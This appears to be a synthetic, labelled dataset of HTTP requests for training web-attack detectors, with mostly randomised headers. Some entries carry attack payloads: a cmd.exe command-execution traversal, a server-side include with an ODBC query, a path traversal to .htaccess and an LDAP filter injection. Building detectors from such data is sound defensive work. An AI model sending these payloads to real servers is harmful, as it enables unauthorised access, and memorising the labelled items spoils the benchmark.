Upgrade: Oce/9.1, a2s/1.1, m5nav/1.5
Warning: 001 www.sds01n.jpg "1Ioysiaieh0EvlxdpDae" "Sat, 29 Apr 06 19:48:47 UTC"
X-Forwarded-For: 194.87.49.44
X-Serial-Number: 6090087986849
----: -----------------------------
~~~~~: ~~~~~~~~~~~

Rlfg=26006071

End - Id: 5319
Start - Id: 17140
class: Valid
GET /eoa/nCHoSB6HAixd9MW/o3sjai/fzV5u5/ykNI2U/nrltzGcnuxe.jsp?sees=84070455&eMlbqjesmvd=61&ualbo=184377302&6ivpIod=gkrH4J%40&AsJ2hr-0BchildMx=n9Y__h.&hesrdieEdP=2364972&7Aeeoqut4sgd=+csselecto&diaaxuiirr=onott0UobR HTTP/1.0
Host: 197.192.88.208
Connection: close
Accept: text/*;q=0.5, text/plain;q=0.1, image/*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.8, compress
Accept-Language: j-reORa;q=0.7, uihcci-grtblh78, emedl-oi9sq, drsa-ma;q=0.2, oejc3g-th6;q=0.0
Cache-Control: isgdme='Sm8so8ie'
Client-ip: 72.33.16.171
Cookie: epetm16=eHp>escripttdr;ecrSln7aietMrc=qJ0.DNRc;he8oeohnh3neAl=t.6fLA;yqo=tdnsslnrioXhm;aaohat=p4yGWX;a0sqoce60=htegeigeo3ne'S
Cookie2: $Version="727"
Date: Sun, 17 Dec 06 04:37:51 UTC
ETag: "1kEXZ13PIVph.9h9d5@"
Expect: 100-continue
From: gcEsmc@smae.st
If-Modified-Since: Tue, 15 Jul 08 16:52:45 GMT
If-Unmodified-Since: Fri, 29 Sep 06 13:09:49 GMT
If-Match: "LSWMKGH-4PPWMG2zH"
If-None-Match: *
If-Range: "6R55eil976zTR8I"
Max-Forwards: 766
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest response="d51b60Fb2FD997Dd8D3a2437b78E45bc"
Authorization: Basic b3luZjpOZHlnbG5zaA==
Range: 289-
Referer: /s7lramnc/tcIyRe.css
TE: trailers,chunked;q=0.2
Trailer: Cache-Control
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 9.3; me-Tf; rv:2.1.3) Gecko/50781515
UA-CPU: StrongARM
UA-Disp: 817,8711,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: 3.0 www.yrtep.jpg, 3.0 www.Ldoi3.jpg:97
Transfer-Encoding: gzip
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 884 66.52.11.38 "buetRO9tneeajg1yc" 
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 92445
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17140
Start - Id: 1799
class: Valid
GET /ed/8jlemwf5nnsdr/hryZdant4ft9heghs/nwja5rC4UYlY9N5/OGNv7zF0hdHuEGI/QV4nph-Hs/fI6Plymv4q.CXoIkBh/2q3SbUt-I/3wiXBGIdSj-4GuVl/2DCin@passwdylWy4mse.tiff?spR6jbb9=hh&nati5wm=dgrattmpogwsasrEt&0eusoe=lole&6zoptRn_LsHd=gmidcpthSNourjjuOe&q5oIuhaTttu4=e6k0rm2E07F&nwnmgaad=7jU&i47io=1323&rsrnaseletth=uiporutelysCo%27w%3Chiwshutdown&araAperEyxtee=sgncp&kiratsedbu=tkOE&radtofaet9ew=es&usr90T6dInullb.fpasswd=hincludetrioh&tlrdwegGO=otdconnectdn&location2DAhttpszd8div=ahe9 HTTP/1.0
Host: www.maklbmr8.org
Connection: ioyrunha
Accept: */*;q=0.8
Accept-Charset: x-mac-greek, cp-932, big5;q=0.0, x-mac-roman;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 242.142.150.13
Cookie: Ciea0do=62988;ctyrgrlct=t;DdITvbscriptjyPhtaccesD0T=95;eflrioter1mh=a6Y04VHnjE6;apwde=18;rfenn92dejee=373
Cookie2: $Version="396"
Date: Sun, 17 Feb 08 08:24:08 UTC
ETag: W/"0l4b4EjQF@zOGq4rP"
Expect: 100-continue
From: 4bGooaep@ehetjoIt.st
If-Modified-Since: Mon, 03 Oct 05 08:43:15 UTC
If-Unmodified-Since: Fri, 19 Sep 08 09:33:28 CET
If-Match: *
If-None-Match: *
If-Range: "D.0XiLHgwRcEMEeBg"
Max-Forwards: 15
MIME-Version: 0.4
Pragma: tj='ep'
Proxy-Authorization: Digest username="rlyw6hrn"
Authorization: NTLM bklkd21oczg0VDFxb2h1bnFpaW5qNG9yb3Nob2VPc2hh
Range: 9724-,33511-083617,2-
Referer: /hen9Ad/nzn9v/crqiEto/aune.tar.gz
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 7.9; ll-sA; rv:3.1.8) Gecko/96864200
UA-CPU: x86
UA-Disp: 756,3724,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 912x237
Via: 9.9 127.105.1.206, 5.3 208.194.239.168:40111, FTP/3.1 215.179.182.146
Transfer-Encoding: aaeelu
Upgrade: pa7r/0.7, 9lsi/0.4
Warning: 604 27.74.229.180 "uehtEmh0ejdosHSisd" "Mon, 15 Feb 10 03:04:51 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1799
Start - Id: 390
class: Valid
GET /aqo@NQlLeb/aabuehH5befsr/ia/qcpassthru.php4?0sMT=2861&rlacphlaaoy0e=Flrtkle1xe HTTP/1.0
Host: www.ononPsoo.be:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-jp;q=0.2, isiri-3342;q=0.5, windows-1252, cp-950;q=0.3, euc-jp;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: atB=sint
Client-ip: 80.119.213.130
Cookie: h0must1a9utettE=967;mcDX.11V4=329;aangOixbW8m2e=7727397;voetdas=yxOdter d
Cookie2: $Version="53"
Date: Mon, 02 Feb 09 13:02:58 CET
ETag: "8gtH4ZMRmT1hoBRlDk"
Expect: caxlro
From: nh7u@trsnroi.it
If-Modified-Since: Mon, 19 Apr 04 21:23:02 UTC
If-Unmodified-Since: Fri, 29 Aug 08 14:39:22 CET
If-Match: *
If-None-Match: "b158mBWCKlB6B6X02W6"
If-Range: "0mdPI76hpiucXg0j"
Max-Forwards: 4
MIME-Version: 5.4
Pragma: hprt3sln=tQtne5de
Proxy-Authorization: Digest nonce
Authorization: NTLM OWhubmxlbmExbG5hbHR0eXJ1dHloYWRsb2VtZWFkeWxuaXJ5NGxpaWFjb2Rh
Range: 541443-68,844-,77-861439
Referer: /eoco.swf
TE: deflate;q=0.8,trailers
Trailer: Range
User-Agent: o5ymh/7.9.4
UA-CPU: x86
UA-Disp: 8170,9079,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 302x8393
Via: fdomeE/3.7 101.150.144.126, 2.7 142.136.203.47, 3.8 www.dahn.js
Transfer-Encoding: vHtst; 2ejax=Syibd
Upgrade: sajgfN/7.8, n2wam/2.4
Warning: 990 183.31.90.109 "igbAcaoD3vs" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 5470041402
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 390
Start - Id: 1640
class: Valid
GET /8kh7tt0sr/fntien/nlS/6iaa/eog3mobr4t/6Eyhz__xU/dvdspte/ottwl5lsseoS5hdepe/jsEPKkNmI/eerormsnde/hxaW/0Zllc2.swf?abeawnnj=%29wy&teZ83hDt=499&tlie2ham6swek=access_logwarn&eemoda=qAsNepzstiaasoemy&tIcfo6lsete=7ecroaEaxrnro HTTP/1.1
Host: 21.47.247.10:80
Connection: ddRtsit
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 170.93.21.88
Cookie: nzsamise9uf=ekzpd0cBU8
Cookie2: $Version="517"
Date: Sat, 11 Mar 06 06:13:46 UTC
ETag: "tBVX.FyYsEPfvzdNa"
Expect: gattfg
From: S6tD@nser.com
If-Modified-Since: Sun, 27 Aug 06 01:10:25 GMT
If-Unmodified-Since: Thu, 07 Jan 10 10:20:25 UTC
If-Match: "6gm9UFATU3pgRzIv"
If-None-Match: *
If-Range: Thu, 21 Jul 05 24:48:14 UTC
Max-Forwards: 894
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: es3tes ibDss=nnhorbz
Authorization: Basic bnVib2dlbDplZjRl
Range: 38957-
Referer: http://03t9e4.st/7re0c/ntho/I8hsa/tuAys.mpg
TE: chunked;q=0.6
Trailer: From
User-Agent: ta7sfgqbt
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: FTP/1.1 142.15.131.34, HTTP/1.6 39.63.214.137, 4.7 204.9.174.254
Transfer-Encoding: compress
Upgrade: 1neao/3.0, tome/1.5, athaw/7.1, axd3ou/1.8, Iet/4.7
Warning: 860 124.167.248.34 "huupmjsHxeoOlre" 
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1640
Start - Id: 33887
class: Valid
POST /mknclers/am92jyPYDsP/0Q6/lHmetaQQCdVFHl/dHfnotoL4Gmwl/baoBAuI.Mfj68/ckmpq/JuYpassthru1r4D/emQv.4H2yo_0bYbJCIRH.html? HTTP/1.0
Content-Length: 56
Content-Language: fstVt8l,s1herhd,dAf
Content-Encoding: identity
Content-Location: http://insl6ti.be/ntons/Erihbhz/udomr/mreDir/yhetoih.pdf
Content-MD5: b2dseHNuYmh0RTJmaW1jbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Sep 07 09:30:54 CET
Last-Modified: Tue, 07 Apr 09 03:09:24 GMT
Host: www.eglh.biz:3
Connection: close
Accept: */*;q=0.0
Accept-Charset: euc-tw;q=0.8, x-mac-chinesesimp;q=0.8, x-mac-chinesesimp, iso-8859-15;q=0.1, x-mac-chinesetrad
Accept-Encoding: *;q=0.7
Accept-Language: eeseeoha-8vo, eRnuf-tsKmAq
Cache-Control: wj=anIm
Client-ip: 163.235.212.144
Cookie: rDnTsfaszPe=uDey
Cookie2: $Version="60"
Date: Thu, 25 May 06 10:13:59 UTC
ETag: "_M66cqFiW1w40iwrKw"
Expect: 100-continue
From: tietc@t0ytt.net
If-Modified-Since: Sun, 11 Jun 06 17:43:57 UTC
If-Unmodified-Since: Wed, 30 Jun 04 24:43:50 UTC
If-Match: *
If-None-Match: "lOnGndKhB@MC8UUvQUc"
If-Range: *
Max-Forwards: 5913
MIME-Version: 4.9
Pragma: 6rcre='o'
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: les4s rtcIc=tswor
Range: 10-81
Referer: /xiNws.pdf
TE: trailers,trailers
Trailer: Warning
User-Agent: Hhrynrolr (nvg3ihO; rft4m1)
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1982x002
Via: 7.9 226.153.31.215, FTP/6.9 220.209.168.53
Transfer-Encoding: virF
Upgrade: eeend/5.3, ctbpo/1.4, 1ep/5.7, cXeiP/1.0
Warning: 650 www.SRhlh0nf.jpeg "naorss8mXmrab" "Sat, 28 Mar 09 21:13:32 GMT"
X-Forwarded-For: 197.252.39.199
X-Serial-Number: 6132370347859311136
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FqRsZ=eocraonph-%&mT8bo.mailSopentmpM=138991&AsCtv=6.1

End - Id: 33887
Start - Id: 14786
class: Valid
GET /ioorasel4air/aL/yzOrbor/Tisarhioliipia1euaa/n5cb@4/tr/mj2POOdOY/eCp.jpeg?mTiilikesR=r%40m&3uPgroup byd-stmpciih=eUcO5D&ni0t=j&ao4g44mgaotFl2Y=S6herotxA&dUvosf=1+aereplacenH&VXSoy=aRLD1 HTTP/1.0
Host: 229.222.144.206:69
Connection: gei9eo
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 104.98.203.85
Cookie: sidnhrrrrtusi=iui5;roEeli6DAd=1(;R6L_bEopt=%(geiamrqlibFeqtns=&;N6nph-.=722354;toartpnmvs2=827513
Cookie2: $Version="671"
Date: Wed, 26 Aug 09 18:44:41 GMT
ETag: W/"Hop3BSwy9ecpkvHNIAa"
Expect: rpoat
From: nOeesl@pemet.it
If-Modified-Since: Thu, 04 Feb 10 14:04:09 GMT
If-Unmodified-Since: Mon, 24 Aug 09 03:26:22 CET
If-Match: "tbmAW32F47ebW5bn"
If-None-Match: "ltjnAi@vSUx5OjUA-y0V"
If-Range: Thu, 19 Feb 04 04:45:47 UTC
Max-Forwards: 13
MIME-Version: 1.7
Pragma: aswrrth='neyrajlj'
Proxy-Authorization: NTLM dGhpb3R2bWRuZGVFczlicm50ZW5zd2VsVGxvZW9lYXVlN2Fp
Authorization: NTLM NGVpZWpzdDZyckVkbHRpZ3R5bnVubnZlUG51aDh3aXRvaWFhZQ==
Range: -902734
Referer: /aoNrppe.php
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 4.4; ts-tt; rv:5.2.1) Gecko/32158084
UA-CPU: Sparc
UA-Disp: 759,727,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1881x145
Via: 7.8 www.ibgn.jpg
Transfer-Encoding: deflate
Upgrade: snemam/8.9, trd/0.2, ysb8i4/8.3, tiEie/9.8
Warning: 389 57.107.55.77 "ixtnuciisLc1" 
X-Forwarded-For: 0.184.13.124
X-Serial-Number: 53821582673428600295
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 14786
Start - Id: 44033
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.RgUds8eoos.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.6, gzip;q=0.6, gzip;q=0.8, deflate
Accept-Language: *
Cache-Control: max-age=23657
Client-ip: 78.141.142.69
Cookie: 2mvr5oi=iRHnfnec50;sjQerlrnv=oMe
Cookie2: $Version="0"
Date: Tue, 03 Oct 06 02:01:35 UTC
ETag: "WbM8En5tZV7LU.d"
Expect: e3et=angools;afxg=l15eYh
From: t8ara@rpmnyne.de
If-Modified-Since: Tue, 12 Feb 08 10:52:51 UTC
If-Unmodified-Since: Wed, 16 Jan 08 15:07:16 GMT
If-Match: *
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: Sun, 09 Aug 09 11:15:26 GMT
Max-Forwards: 669
MIME-Version: 0.2
Pragma: o='0rOus'
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Digest response="74b14Bd658AABAFabDFa0d4eF9c24bA4"
Range: 67-764741,470518-20,3-202913
Referer: /rjetStom/o0cOsN.sh
TE: gzip,trailers,deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/2.2 (compatible; Konqueror/9.7; Open BSD i386; 7osgs3sl; 1ootDati; eRuuAccoqr)
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/6.9 14.89.228.227:412, hta/0.0 www.sere.shtml:0694
Transfer-Encoding: nraOo
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44033
Start - Id: 8709
class: Valid
GET /b9Eydjp0kL8Tt9ebFX5/0YK0K3AkNi72DMq/jZBwONtR/n4Gms/QhOahfwDlehEdet/qGKTiwaofJk/1maW81AK55corbWdQm/80/nFzG3HcP4Z8QNC2p/se.mspx?9hhesmnnrtsar=n&utte2i6zitie8=azmZGb8&ondoeers=ixtermmz&roee=deleteez&9hr0t=6829&wgraldr7Wn5eLn=tnwlhYaguTwwv&c9otlbir=851633165&rrl2utdsvlm6t=e+0&esShht7t=941218&3vetr=n1yenrunit6bts&gVOzHsm.gox=864455&nkeutbNPulit=%3B&iruao0iw8=apsi2hrminsoimge&tpsrtbttwMeie=na%3Btpn%3Byd HTTP/1.0
Host: 66.126.191.72:2
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ki-2;q=0.7, 3ttwwTk-h;q=0.2, s-oneLsl;q=0.2, D-pdcsmau;q=0.4
Cache-Control: no-cache
Client-ip: 197.96.155.37
Cookie: aohsc7od4=childJg;XCxUwBbYYX=98816537;2ahisusari=tw;lot3mu4=34406867
Cookie2: $Version="214"
Date: Tue, 21 Feb 06 18:43:54 CET
ETag: W/"iBMMyw3mtjYcJdHG"
Expect: 100-continue
From: mteeb@o92wOhll.cz
If-Modified-Since: Tue, 10 Jun 08 07:11:05 GMT
If-Unmodified-Since: Tue, 09 Nov 04 18:23:12 GMT
If-Match: *
If-None-Match: "dU1xvdHR0ooGqYo"
If-Range: *
Max-Forwards: 757
MIME-Version: 9.4
Pragma: ugedd=dorh
Proxy-Authorization: as9ct dmdsne=vmoz7nhe
Authorization: NTLM MXNPNmJnZWV0TGNyd3R0Y2lSZG9ybW5yZXVFbW9DVFJ0czZpaHJU
Range: -1251,-8,78356-
Referer: /6dnct/dmdeof6e.mp3
TE: trailers,chunked;q=0.7
Trailer: TE
User-Agent: jpTeiarhaa
UA-CPU: PowerPC
UA-Disp: 232,8608,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 559x025
Via: 7.7 www.ythoa.gif, HTTP/1.0 www.fIntegup.shtml
Transfer-Encoding: vpmoTd
Upgrade: t6hhg/7.3, iEEkud/1.6
Warning: 722 191.87.245.62 "ldhaa3etlrseAcnvoe3a" "Fri, 03 Dec 04 20:48:39 CET"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 23222
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 8709
Start - Id: 23299
class: Valid
GET /1kQF/t7gnsXsromt/fS1BiHIURvNaE3Ae.jpeg?ibnq=9561&Ev2iagdar4e=617 HTTP/1.1
Host: www.dieodueeh.gov
Connection: keep-alive
Accept: application/rtf, image/jpeg
Accept-Charset: x-mac-chinesesimp;q=0.2, x-mac-japanese;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: 5nnca='t'
Client-ip: 109.32.141.176
Cookie: iaoin9CcePet=a<s
Cookie2: $Version="39"
Date: Tue, 07 Jul 09 06:19:07 GMT
ETag: W/"NUZkkUOZ6GCqV.vSRcdw"
Expect: 100-continue
From: zttea@aht7uetl.it
If-Modified-Since: Tue, 27 Mar 07 06:07:20 UTC
If-Unmodified-Since: Mon, 18 Feb 08 07:14:17 GMT
If-Match: *
If-None-Match: "qo3vpu5Xpv.9m9ra"
If-Range: "rGQU9ZW4ALSyaRxDABnr"
Max-Forwards: 2564
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: NTLM YWRnZ1J4dHNSb0VxOG5qQkR0eWsydHVuTmkxZW9yN3RkaGVzNGVzZWtSYXBxdGFD
Range: 4-,60-1,6450-5
Referer: http://hiO6n.ch/Chsoah/Tsaii82/pstsodh/liriia9.dll
TE: trailers,gzip;q=0.8
Trailer: Accept
User-Agent: Mozilla/7.6 (compatible; MSIE 6.6; Mac OS X; Isr8e; zeAsnr4lc; zdrqew0)
UA-CPU: MIPS
UA-Disp: 8971,5529,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 626x088
Via: FTP/1.7 135.90.74.189:62, tatlH3/5.6 230.106.229.57, FTP/9.4 144.194.238.111
Transfer-Encoding: gzip
Upgrade: talot/2.9, wobe/2.7, sghntg/1.7, t9eid/6.8, HpE/1.8
Warning: 798 248.66.204.0 "oxn87lNe" 
X-Forwarded-For: 232.26.81.244
X-Serial-Number: 1450242
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23299
Start - Id: 40889
class: SSI
GET /losoaeo/mtdaeaLo/d.MD6@t0iB/rxsmGm/c@ZQQBzhTQyc5eTOZ/9a/iOk2sam5uf14EQs5.html?fL6BhqeO=drop4capaT+hhlszr&tnsrvot3pzr=a+esystems%5Cn%7Ca&mSRk1rdmnbxexec=xyp74T0&wsd2oEreeypanii=t&piocnelibS=%3C%21--%23odbc++++statement++++%3D+%22select+++++Tot%2C+++f9ntdee%2C++++oebseU+++from+ufLaoti+++++order+++by+++++0%2C+602%2C+++6%22++++--%3E HTTP/1.1
Host: www.taeEasTl.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 74.22.128.43
Cookie: D4hhnna6tgx=4076658244;xclohtoaafs=passwd ;1snnTien3rcH0=f0lK3Y;ctanrste6box=84989;z3tCnwise=emafauu;eireOUsO4ed=sock_streamroe
Cookie2: $Version="39"
Date: Tue, 04 Nov 08 24:25:47 GMT
ETag: W/"cdUEMz1rdtb6L7v"
Expect: iu4peePa=sip9hx
From: iead0@nuqh1.org
If-Modified-Since: Wed, 23 Jul 08 14:12:04 UTC
If-Unmodified-Since: Wed, 19 Dec 07 16:22:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Jan 05 02:24:26 CET
Max-Forwards: 1
MIME-Version: 7.8
Pragma: eteae=iu
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: NTLM dGRqYUlJdG5vODJuZW5kN25yaXR0c2FjQXJwaW90aWlyeHlyYXNpZXNza2lvSXNy
Range: 453-748
Referer: http://emN3.biz/tLS8e.txt
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.3 (Windows; U; Win 9x 9.5; 5a-ut; rv:9.6.0) Gecko/31025024
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/5.0 168.162.201.153:17786, 3.8 www.rs8c.html
Transfer-Encoding: tortcT
Upgrade: i72f/4.9, Zi2a/5.6, sifx9/9.1
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40889
Start - Id: 46101
class: PathTransversal
PUT /i_1p45s3yukk5vIrEB/jR6iframenJ1LC/7hrerrcpeiEstNoyFe/oL2Dfl5Kj.w/H5JKX/fEZyg.H/it4hlias/3HjtFutdomhloaepsaj/eDrRgW.swf? HTTP/1.0
Content-Length: 33
Content-Language: sxtsiei,Eezkr
Content-Encoding: deflate
Content-Location: /eanatc/oesz2e4/ttwyscam.tiff
Content-MD5: M3R1bjhsc3J4cHJzaGRDbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Apr 05 21:48:35 CET
Last-Modified: Mon, 28 May 07 13:51:36 CET
Host: 82.44.210.129
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 245.20.88.13
Cookie: LCphpSounionKopenqJ=309;rn=tUeXyVt7X;0eeataoqa=nodei0a51-ttls3+twtPn;y7ieITlq1ltydt=d;lensosnl4n8udn=s;tCZnm.yU==D;
Cookie2: $Version="0"
Date: Wed, 04 Jul 07 02:23:36 UTC
ETag: W/"Lp6NyFktXxgyhfAqmG0"
Expect: 1riwi
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Fri, 23 Oct 09 10:00:17 CET
If-Match: "S2LD5KUML2M384N@i"
If-None-Match: *
If-Range: *
Max-Forwards: 495
MIME-Version: 0.9
Pragma: tanio8a='taiEw'
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: NTLM YXBzZWlhN29nMmVzbWZyaVRvaWxtZUFob3l0SW5zckNuTVRvNnhFc3R0
Range: 43-
Referer: /ncnAlILa.cfm
TE: gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/0.4 (compatible; Konqueror/6.3; Win98; ynee)
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: vecj/8.8, yebd/9.0, jn0/6.9, OasdIr/4.2
Warning: 952 www.hhNewo.css "1l2t" "Sun, 16 Oct 05 14:27:34 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ep=tIK&ElqeeF=s:/.htaccess~

End - Id: 46101
Start - Id: 37363
class: LdapInjection
GET /kitsnhy.tiff?td=Dws&e3neie=166509556&sueInenAaseCi=tcapj&euae=42513&qhpiOo=pu&ichnm2taLoiaa=a2k7s&hrdtuonhi5u=92050 HTTP/1.1
Host: www.pasignr.be:0418
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: )( |   (o6E=rnbir*)
Cache-Control: only-if-cached
Client-ip: 117.148.34.106
Cookie: 47X_I58kpwM= iframeiahcEUnhf-aeodn;rrdJlee=iswn)
Cookie2: $Version="89"
Date: Thu, 28 Dec 06 03:43:41 GMT
ETag: W/"1sErXqkCyucdByw"
Expect: osmxe2=dnrEhje;ehUcdt
From: zhwiybw@hehuAUa89a.fr
If-Modified-Since: Mon, 20 Jun 05 03:33:02 CET
If-Unmodified-Since: Fri, 16 Apr 04 08:06:13 UTC
If-Match: *
If-None-Match: "wNpxZVFBdjNY-Ay"
If-Range: Tue, 30 Dec 08 04:53:43 CET
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic b3NuZXI6Z0FvdWU=
Authorization: NTLM YXZuZWFpdGVoc29PcGZlZVRjcnU3aGVodGNteXQ0bmlhbm1sb3RjNWFyc2hlZQ==
Range: 257723-74,-66
Referer: http://www.inefaiQ.cz/0aeee.tiff
TE: trailers,deflate,gzip;q=0.9
Trailer: Accept-Language
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 2.0; eh-3a; rv:4.8.7) Gecko/94288270
UA-CPU: MIPS
UA-Disp: 794,0889,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5121x090
Via: zc3i/6.8 www.eeeDpg.png, 8.1 233.174.254.51
Transfer-Encoding: emee
Upgrade: oie/1.4, esndns/6.8, eengr0/5.0, e7la1/2.5
Warning: 063 211.26.149.166 "smbe8tiNrn" "Sat, 11 Mar 06 17:33:18 CET"
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 30089699
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37363
Start - Id: 19347
class: Valid
GET /ieeoEsne59ual/tCFBR@EL/suVApyyA6/n8nRssepEiyqrdeiaeid/nEuiSoy7erndoE1yih8/nj8y2awJD/ood8zIpvJKfOaMW/homewp-kBHNTimhomeiftAh/d7.4BNaqbFdFLOcSVB/1ZrHsjx8f5Od_5RDv2F/nu5g.gif? HTTP/1.1
Host: 86.44.68.199
Connection: avno5l
Accept: audio/*, video/*, audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ueky9omi-td8asre, qn2murtt-sWiei, to2-y8hhrigw, x-bosF;q=0.3, icr-cr2l
Cache-Control: tucl=i1
Client-ip: 210.226.84.255
Cookie: Rieylohsu4i=6907;ce4hwuhinpEtkZ=02309;8hrzit=nkjHEZHZk;lanRev=EProO80
Cookie2: $Version="84"
Date: Mon, 20 Sep 04 13:01:27 CET
ETag: "a2YDbXVj7A6.vSq80bLA"
Expect: N1nheiin
From: q8nm@dnhqn.uk
If-Modified-Since: Tue, 01 Sep 09 15:37:54 UTC
If-Unmodified-Since: Tue, 11 Mar 08 18:17:22 CET
If-Match: *
If-None-Match: "U5sGFzOb-gf9.DB58eAs"
If-Range: *
Max-Forwards: 0988
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM b2FvempTSWhuOWVtcWlvaXU4dGszaXVpbGVpaXJwZUFtaGkzYWxhdHN0UmVuRg==
Authorization: Basic aG5pc2VTMzpsMW4wMHM=
Range: 0-6218,62-,-50681
Referer: http://iswos3.de/rmabzbn/eu7o/ttlmvoh/l0sqhhe/aiweSm.conf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.1 (X11; U; Linux i586 9.2; za-e1; rv:1.7.1) Gecko/29446170
UA-CPU: StrongARM
UA-Disp: 521,2538,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x2255
Via: FTP/7.1 www.eeeaA.htm:7749
Transfer-Encoding: gzip
Upgrade: aTrdtn/5.5, drrU/7.9, dWr/1.4
Warning: 807 www.ndncvohd.html "snOcrN" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19347
Start - Id: 30348
class: Valid
